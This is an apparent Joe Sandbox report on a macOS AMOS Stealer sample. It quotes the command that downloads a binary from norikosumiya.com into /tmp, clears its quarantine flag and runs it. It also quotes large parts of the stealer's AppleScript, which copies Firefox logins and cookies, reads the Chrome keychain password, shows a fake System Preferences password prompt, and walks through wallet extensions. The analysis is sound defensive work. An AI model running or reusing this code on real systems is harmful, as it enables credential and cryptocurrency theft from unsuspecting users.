macOS Analysis Report

Overview

General Information

Analysis ID:1594700

Detection

AMOS Stealer
Score:60
Range:0 - 100
Whitelisted:false

Signatures

Detected AMOS Stealer
Executes Apple scripts with very long statement arguments
Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration
Executes the "dscl" command with authonly argument (probably to verify the login password)
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "mkdir" command used to create folders
Executes the "system_profiler" command used to collect detailed system hardware and software information
Reads file resource fork extended attributes
Reads hardware related sysctl values
Reads the sysctl hardware model value (potentially used for VM-detection)
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Reads the systems OS release and/or type
Reads the systems hostname
Uses AppleScript framework/components containing Apple Script related functionalities
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts
Writes FAT Mach-O files to disk
Writes Mach-O files to the tmp directory

Classification

[Classification chart: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale clean / suspicious / malicious]
Joe Sandbox version:42.0.0 Malachite
Start date and time:2025-01-19 20:30:45 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 8s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultmaccmdlinecookbook.jbs
Analysis system description:Virtual Machine, Mojave (Office 16 16.27, Java 11.0.2+9, Adobe Reader 2019.010.20099)
macOS major version:10.14
CPU architecture:x86_64
Analysis Mode:default
Detection:MAL
Classification:mal60.spyw.evad.mac@0/4@2/0
  • Excluded IPs from analysis (whitelisted): 17.253.119.202, 17.253.119.201, 23.222.201.219, 17.253.21.204, 17.253.21.205, 17.36.200.79, 23.220.136.24
  • Excluded domains from analysis (whitelisted): mesu-cdn.apple.com.akadns.net, e11408.d.akamaiedge.net, lcdn-locator-usuqo.apple.com.akadns.net, updates.cdn-apple.com.akadns.net, gateway.icloud.com, e673.dsce9.akamaiedge.net, help-ar.apple.com.edgekey.net, crl.apple.com, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, mesu-cdn.origin-apple.com.akadns.net, lcdn-locator.apple.com.akadns.net, help.origin-apple.com.akadns.net, lcdn-locator.apple.com, mesu.g.aaplimg.com, updates.g.aaplimg.com, itunes.apple.com.edgekey.net, help.apple.com, mesu.apple.com, init.itunes.apple.com, updates.cdn-apple.com, init-cdn.itunes-apple.com.akadns.net
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: norikosumiya.com
Command:/bin/sh -c "curl -o /tmp/update https://norikosumiya.com/brew/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update"
PID:615
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 229k 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0
87 229k 87 199k 0 0 94252 0 0:00:02 0:00:02 --:--:-- 94221
100 229k 100 229k 0 0 105k 0 0:00:02 0:00:02 --:--:-- 105k
sh: line 0: disown: current: no such job
  • System is macvm-mojave
  • nsurlstoraged (MD5: 321b0a40e24b45f0af49ba42742b3f64) Arguments: /usr/libexec/nsurlstoraged --privileged
  • sh (MD5: be55e8952a262d0e524239dbf82191ed) Arguments: /bin/sh -c curl -o /tmp/update https://norikosumiya.com/brew/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
    • sh New Fork (PID: 616, Parent: 615)
    • curl (MD5: 2418204e23e2952e7995f1819a1f78f5) Arguments: curl -o /tmp/update https://norikosumiya.com/brew/update
    • sh New Fork (PID: 618, Parent: 615)
    • xattr (MD5: e2ca6555fe4b8c6a97d1ced2156c9b69) Arguments: xattr -c /tmp/update
    • Python (MD5: 710c6cc30780eea712240851b44d9eab) Arguments: /usr/bin/python /usr/bin/xattr-2.7 -c /tmp/update
    • sh New Fork (PID: 619, Parent: 615)
    • chmod (MD5: 917cfbf6084318922f8091f050a0bbed) Arguments: chmod +x /tmp/update
    • sh New Fork (PID: 620, Parent: 615)
    • update (MD5: 0418181caaba4686fae772b60d9a2c62) Arguments: /tmp/update
      • sh New Fork (PID: 621, Parent: 620)
        • sh New Fork (PID: 622, Parent: 621)
        • pkill (MD5: ad01660bd9fdfcf9c67a4879e06d0aa3) Arguments: pkill Terminal
      • sh New Fork (PID: 623, Parent: 620)
        • sh New Fork (PID: 624, Parent: 623)
        • osascript (MD5: f13b7c85f3c1c08fae3b709a536281a1) Arguments: osascript -e set release to trueset filegrabbers to trueon filesizer(paths)set fsz to 0tryset theItem to quoted form of POSIX path of pathsset fsz to (do shell script '/usr/bin/mdls -name kMDItemFSSize -raw ' & theItem)end tryreturn fszend filesizeron mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryend FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryend BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon readwrite2(path_to_file, path_as_save)tryset folderPath to do shell script 'dirname ' & quoted form of path_as_savemkdir(folderPath)tell application 'Finder' set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacingend tellend tryend readwrite2on isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn 
trueend ifreturn falseend tryend isDirectoryon GrabFolderLimit(sourceFolder, destinationFolder)tryset bankSize to 0set exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolderLimit(itemPath, savePath)elseset fsz to filesizer(itemPath)set bankSize to bankSize + fszif bankSize < 10 * 1024 * 1024 thenreadwrite(itemPath, savePath)end ifend ifend ifend repeatend tryend GrabFolderLimiton GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'dumps', 'emoji', 'user_data', '__update__', 'user_data#2', 'user_data#3'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon parseFF(firefox, writemind)tryset myFiles to {'/cookies.sqlite', '/formhistory.sqlite', '/key4.db', '/logins.json'}set fileList to list folder firefox without invisiblesrepeat with currentItem in fileListset fpath to writemind & 'ff/' & currentItemset readpath to firefox & currentItemrepeat with FFile in myFilesreadwrite(readpath & FFile, fpath & FFile)end repeatend repeatend tryend parseFFon checkvalid(username, password_entered)tryset result to do shell script 'dscl . 
authonly ' & quoted form of username & space & quoted form of password_enteredif result is not equal to '' thenreturn falseelsereturn trueend ifon errorreturn falseend tryend checkvalidon getpwd(username, writemind)tryif checkvalid(username, '') thenset result to do shell script 'security 2>&1 > /dev/null find-generic-password -ga \'Chrome\' | awk \'{print $2}\''writeText(result as string, writemind & 'masterpass-chrome')elserepeatset result to display dialog 'Required Application Helper.\nPlease enter password for continue.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'System Preferences' with hidden answerset password_entered to text returned of resultif checkvalid(username, password_entered) thenwriteText(password_entered, writemind & 'pwd')return password_enteredend ifend repeatend ifend tryreturn ''end getpwdon grabPlugins(paths, savePath, pluginList, index)tryset fileList to list folder paths without invisiblesrepeat with PFile in fileListrepeat with Plugin in pluginListif (PFile contains Plugin) thenset newpath to paths & PFileset newsavepath to savePath & '/' & Pluginif index thenset newsavepath to newsavepath & '/IndexedDB/'end ifGrabFolder(newpath, newsavepath)end ifend repeatend repeatend tryend grabPluginson chromium(writemind, chromium_map)set pluginList to {'keenhcnmdmjjhincpilijphpiohdppno', 'hbbgbephgojikajhfbomhlmmollphcad', 'cjmkndjhnagcfbpiemnkdpomccnjblmj', 'dhgnlgphgchebgoemcjekedjjbifijid', 'hifafgmccdpekplomjjkcfgodnhcellj', 'kamfleanhcmjelnhaeljonilnmjpkcjc', 'jnldfbidonfeldmalbflbmlebbipcnle', 'fdcnegogpncmfejlfnffnofpngdiejii', 'klnaejjgbibmhlephnhpmaofohgkpgkd', 'pdadjkfkgcafgbceimcpbkalnfnepbnk', 'kjjebdkfeagdoogagbhepmbimaphnfln', 'ldinpeekobnhjjdofggfgjlcehhmanlj', 'dkdedlpgdmmkkfjabffeganieamfklkm', 'bcopgchhojmggmffilplmbdicgaihlkp', 'kpfchfdkjhcoekhdldggegebfakaaiog', 'idnnbdplmphpflfnlkomgpfbpcgelopg', 'mlhakagmgkmonhdonhkpjeebfphligng', 
'bipdhagncpgaccgdbddmbpcabgjikfkn', 'gcbjmdjijjpffkpbgdkaojpmaninaion', 'nhnkbkgjikgcigadomkphalanndcapjk', 'bhhhlbepdkbapadjdnnojkbgioiodbic', 'hoighigmnhgkkdaenafgnefkcmipfjon', 'klghhnkeealcohjjanjjdaeeggmfmlpl', 'nkbihfbeogaeaoehlefnkodbefgpgknn', 'fhbohimaelbohpjbbldcngcnapndodjp', 'ebfidpplhabeedpnhjnobghokpiioolj', 'emeeapjkbcbpbpgaagfchmcgglmebnen', 'fldfpgipfncgndfolcbkdeeknbbbnhcc', 'penjlddjkjgpnkllboccdgccekpkcbin', 'fhilaheimglignddkjgofkcbgekhenbh', 'hmeobnfnfcmdkdcmlblgagmfpfboieaf', 'cihmoadaighcejopammfbmddcmdekcje', 'lodccjjbdhfakaekdiahmedfbieldgik', 'omaabbefbmiijedngplfjmnooppbclkk', 'cjelfplplebdjjenllpjcblmjkfcffne', 'jnlgamecbpmbajjfhmmmlhejkemejdma', 'fpkhgmpbidmiogeglndfbkegfdlnajnf', 'bifidjkcdpgfnlbcjpdkdcnbiooooblg', 'amkmjjmmflddogmhpjloimipbofnfjih', 'flpiciilemghbmfalicajoolhkkenfel', 'hcflpincpppdclinealmandijcmnkbgn', 'aeachknmefphepccionboohckonoeemg', 'nlobpakggmbcgdbpjpnagmdbdhdhgphk', 'momakdpclmaphlamgjcndbgfckjfpemp', 'mnfifefkajgofkcjkemidiaecocnkjeh', 'fnnegphlobjdpkhecapkijjdkgcjhkib', 'ehjiblpccbknkgimiflboggcffmpphhp', 'ilhaljfiglknggcoegeknjghdgampffk', 'pgiaagfkgcbnmiiolekcfmljdagdhlcm', 'fnjhmkhhmkbjkkabndcnnogagogbneec', 'bfnaelmomeimhlpmgjnjophhpkkoljpa', 'imlcamfeniaidioeflifonfjeeppblda', 'mdjmfdffdcmnoblignmgpommbefadffd', 'ooiepdgjjnhcmlaobfinbomgebfgablh', 'pcndjhkinnkaohffealmlmhaepkpmgkb', 'ppdadbejkmjnefldpcdjhnkpbjkikoip', 'cgeeodpfagjceefieflmdfphplkenlfk', 'dlcobpjiigpikoobohmabehhmhfoodbb', 'jiidiaalihmmhddjgbnbgdfflelocpak', 'bocpokimicclpaiekenaeelehdjllofo', 'pocmplpaccanhmnllbbkpgfliimjljgo', 'cphhlgmgameodnhkjdmkpanlelnlohao', 'mcohilncbfahbmgdjkbpemcciiolgcge', 'bopcbmipnjdcdfflfgjdgdjejmgpoaab', 'khpkpbbcccdmmclmpigdgddabeilkdpd', 'ejjladinnckdgjemekebdpeokbikhfci', 'phkbamefinggmakgklpkljjmgibohnba', 'epapihdplajcdnnkdeiahlgigofloibg', 'hpclkefagolihohboafpheddmmgdffjm', 'cjookpbkjnpkmknedggeecikaponcalb', 'cpmkedoipcpimgecpmgpldfpohjplkpp', 'modjfdjcodmehnpccdjngmdfajggaoeh', 
'ibnejdfjmmkpcnlpebklmnkoeoihofec', 'afbcbjpbpfadlkmhmclhkeeodmamcflc', 'kncchdigobghenbbaddojjnnaogfppfj', 'efbglgofoippbgcjepnhiblaibcnclgk', 'mcbigmjiafegjnnogedioegffbooigli', 'fccgmnglbhajioalokbcidhcaikhlcpm', 'hnhobjmcibchnmglfbldbfabcgaknlkj', 'apnehcjmnengpnmccpaibjmhhoadaico', 'enabgbdfcbaehmbigakijjabdpdnimlg', 'mgffkfbidihjpoaomajlbgchddlicgpn', 'fopmedgnkfpebgllppeddmmochcookhc', 'jojhfeoedkpkglbfimdfabpdfjaoolaf', 'ammjlinfekkoockogfhdkgcohjlbhmff', 'abkahkcbhngaebpcgfmhkoioedceoigp', 'dcbjpgbkjoomeenajdabiicabjljlnfp', 'gkeelndblnomfmjnophbhfhcjbcnemka', 'pnndplcbkakcplkjnolgbkdgjikjednm', 'copjnifcecdedocejpaapepagaodgpbh', 'hgbeiipamcgbdjhfflifkgehomnmglgk', 'mkchoaaiifodcflmbaphdgeidocajadp', 'ellkdbaphhldpeajbepobaecooaoafpg', 'mdnaglckomeedfbogeajfajofmfgpoae', 'nknhiehlklippafakaeklbeglecifhad', 'ckklhkaabbmdjkahiaaplikpdddkenic', 'fmblappgoiilbgafhjklehhfifbdocee', 'nphplpgoakhhjchkkhmiggakijnkhfnd', 'cnmamaachppnkjgnildpdmkaakejnhae', 'fijngjgcjhjmmpcmkeiomlglpeiijkld', 'niiaamnmgebpeejeemoifgdndgeaekhe', 'odpnjmimokcmjgojhnhfcnalnegdjmdn', 'lbjapbcmmceacocpimbpbidpgmlmoaao', 'hnfanknocfeofbddgcijnmhnfnkdnaad', 'hpglfhgfnhbgpjdenjgmdgoeiappafln', 'egjidjbpglichdcondbcbdnbeeppgdph', 'ibljocddagjghmlpgihahamcghfggcjc', 'gkodhkbmiflnmkipcmlhhgadebbeijhh', 'dbgnhckhnppddckangcjbkjnlddbjkna', 'mfhbebgoclkghebffdldpobeajmbecfk', 'nlbmnnijcnlegkjjpcfjclmcfggfefdm', 'nlgbhdfgdhgbiamfdfmbikcdghidoadd', 'acmacodkjbdgmoleebolmdjonilkdbch', 'agoakfejjabomempkjlepdflaleeobhb', 'dgiehkgfknklegdhekgeabnhgfjhbajd', 'onhogfjeacnfoofkfgppdlbmlmnplgbn', 'kkpehldckknjffeakihjajcjccmcjflh', 'jaooiolkmfcmloonphpiiogkfckgciom', 'ojggmchlghnjlapmfbnjholfjkiidbch', 'pmmnimefaichbcnbndcfpaagbepnjaig', 'oiohdnannmknmdlddkdejbmplhbdcbee', 'aiifbnbfobpmeekipheeijimdpnlpgpp', 'aholpfdialjgjfhomihkjbmgjidlcdno', 'anokgmphncpekkhclmingpimjmcooifb', 'kkpllkodjeloidieedojogacfhpaihoh', 'iokeahhehimjnekafflcihljlcjccdbe', 'ifckdpamphokdglkkdomedpdegcjhjdp', 
'loinekcabhlmhjjbocijdoimmejangoa', 'fcfcfllfndlomdhbehjjcoimbgofdncg', 'ifclboecfhkjbpmhgehodcjpciihhmif', 'dmkamcknogkgcdfhhbddcghachkejeap', 'ookjlbkiijinhpmnjffcofjonbfbgaoc', 'oafedfoadhdjjcipmcbecikgokpaphjk', 'mapbhaebnddapnmifbbkgeedkeplgjmf', 'cmndjbe
          • sh (MD5: be55e8952a262d0e524239dbf82191ed) Arguments: sh -c echo $((RANDOM % 9000 + 1000))
          • sh (MD5: be55e8952a262d0e524239dbf82191ed) Arguments: sh -c system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
          • sh (MD5: be55e8952a262d0e524239dbf82191ed) Arguments: sh -c mkdir -p '/tmp/4302'
          • mkdir (MD5: bbbaafd2a4d7dcb9ddd178d814fea708) Arguments: mkdir -p /tmp/4302
          • sh (MD5: be55e8952a262d0e524239dbf82191ed) Arguments: sh -c dscl . authonly 'root' ''
          • dscl (MD5: 9a2337f2a5a6271e0187153296de3c9f) Arguments: dscl . authonly root
  • dirhelper (MD5: 23edb05ab305e115e8874baa5b1e3004) Arguments: /usr/libexec/dirhelper
  • eficheck (MD5: 328beb81a2263449258057506bb4987f) Arguments: /usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
  • cleanup
No yara matches
No Suricata rule has matched

Source: unknown | HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49349 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 17.248.228.69:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 81.19.135.228:443 -> 192.168.11.12:49356 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49395 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49396 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49397 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49398 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49399 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49400 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49401 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49402 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49403 version: TLS 1.2
Source: unknown | TCP traffic detected without corresponding DNS query: 23.55.204.208
Source: unknown | TCP traffic detected without corresponding DNS query: 23.55.204.208
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /brew/update HTTP/1.1
  Host: norikosumiya.com
  User-Agent: curl/7.54.0
  Accept: */*
Source: global traffic | DNS traffic detected: DNS query: norikosumiya.com
Source: global traffic | DNS traffic detected: DNS query: h3.apis.apple.map.fastly.net
Source: /usr/bin/curl (PID: 616) | Reads from socket in process: data
Source: update, 00000620.00000260.9.000000010527f000.00000001052a8000.r--.sdmp | String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: update, 00000620.00000260.9.000000010527f000.00000001052a8000.r--.sdmp, update, 00000620.00000260.1.0000000101bc7000.0000000101bcd000.r--.sdmp, update.251.dr | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: update, 00000620.00000260.9.000000010527f000.00000001052a8000.r--.sdmp | String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: update, 00000620.00000260.9.000000010527f000.00000001052a8000.r--.sdmp | String found in binary or memory: http://www.apple.com/certificateauthority0
Source: update, 00000620.00000260.9.000000010527f000.00000001052a8000.r--.sdmp | String found in binary or memory: https://www.apple.com/appleca/0
Source: unknown | Network traffic detected: HTTP traffic on port 49399 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49403
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49402
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49401
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49389
Source: unknown | Network traffic detected: HTTP traffic on port 49397 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49400
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49388
Source: unknown | Network traffic detected: HTTP traffic on port 49395 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49388 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49401 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49403 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49398 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49350 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49356
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49399
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49398
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49397
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49396
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49395
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49350
Source: unknown | Network traffic detected: HTTP traffic on port 49396 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49356 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49389 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49400 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49402 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49349 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49349
Source: /usr/bin/curl (PID: 616) | Writes from socket in process: data
Source: classification engine | Classification label: mal60.spyw.evad.mac@0/4@2/0

Persistence and Installation Behavior

Source: /bin/sh (PID: 624) | Osascript command executed: osascript -e set release to trueset filegrabbers to trueon filesizer(paths)set fsz to 0tryset theItem to quoted form of POSIX path of pathsset fsz to (do shell script '/usr/bin/mdls -name kMDItemFSSize -raw ' & theItem)end tryreturn fszend filesizeron mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryend FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryend BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon readwrite2(path_to_file, path_as_save)tryset folderPath to do shell script 'dirname ' & quoted form of path_as_savemkdir(folderPath)tell application 'Finder' set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacingend tellend tryend readwrite2on isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifreturn 
falseend tryend isDirectoryon GrabFolderLimit(sourceFolder, destinationFolder)tryset bankSize to 0set exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolderLimit(itemPath, savePath)elseset fsz to filesizer(itemPath)set bankSize to bankSize + fszif bankSize < 10 * 1024 * 1024 thenreadwrite(itemPath, savePath)end ifend ifend ifend repeatend tryend GrabFolderLimiton GrabFolder(sourceFolder, destinationFolder)tryset exceptions
Source: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 (PID: 615) | Shell command executed: /bin/sh -c curl -o /tmp/update https://norikosumiya.com/brew/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
Source: /tmp/update (PID: 620) | Shell command executed: sh -c disown pkill Terminal
Source: /tmp/update (PID: 620) | Shell command executed: sh -c osascript -e 'set release to trueset filegrabbers to trueon filesizer(paths)set fsz to 0tryset theItem to quoted form of POSIX path of pathsset fsz to (do shell script '/usr/bin/mdls -name kMDItemFSSize -raw ' & theItem)end tryreturn fszend filesizeron mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryend FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryend BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon readwrite2(path_to_file, path_as_save)tryset folderPath to do shell script 'dirname ' & quoted form of path_as_savemkdir(folderPath)tell application 'Finder' set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacingend tellend tryend readwrite2on isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend 
ifreturn falseend tryend isDirectoryon GrabFolderLimit(sourceFolder, destinationFolder)tryset bankSize to 0set exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolderLimit(itemPath, savePath)elseset fsz to filesizer(itemPath)set bankSize to bankSize + fszif bankSize < 10 * 1024 * 1024 thenreadwrite(itemPath, savePath)end ifend ifend ifend repeatend tryend GrabFolderLimiton GrabFolder(sourceFolder, destinationFolder)tryset exc
Source: /usr/bin/osascript (PID: 625) Shell command executed: sh -c echo $((RANDOM % 9000 + 1000))
Source: /usr/bin/osascript (PID: 626) Shell command executed: sh -c system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
Source: /usr/bin/osascript (PID: 631) Shell command executed: sh -c mkdir -p '/tmp/4302'
Source: /usr/bin/osascript (PID: 632) Shell command executed: sh -c dscl . authonly 'root' ''
Source: /bin/sh (PID: 619) Chmod executable: /bin/chmod -> chmod +x /tmp/update
Source: /bin/sh (PID: 616) Curl executable: /usr/bin/curl -> curl -o /tmp/update https://norikosumiya.com/brew/update
Source: /bin/sh (PID: 622) Pkill executable: /usr/bin/pkill -> pkill Terminal
Source: /bin/sh (PID: 631) Mkdir executable: /bin/mkdir -> mkdir -p /tmp/4302
Source: /usr/bin/osascript (PID: 624) AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 624) AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 624) AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 624) AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/curl (PID: 616) File written: /private/tmp/update
Source: /usr/bin/curl (PID: 616) FAT Mach-O written to tmp path: /private/tmp/update
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618) Random device file read: /dev/urandom
Source: /usr/bin/osascript (PID: 624) Random device file read: /dev/random
Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 653) Random device file read: /dev/random
Source: submitted sample Stderr: % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 0 229k 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0 87 229k 87 199k 0 0 94252 0 0:00:02 0:00:02 --:--:-- 94221100 229k 100 229k 0 0 105k 0 0:00:02 0:00:02 --:--:-- 105ksh: line 0: disown: current: no such job: exit code = 0
Source: /usr/bin/osascript (PID: 624) AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
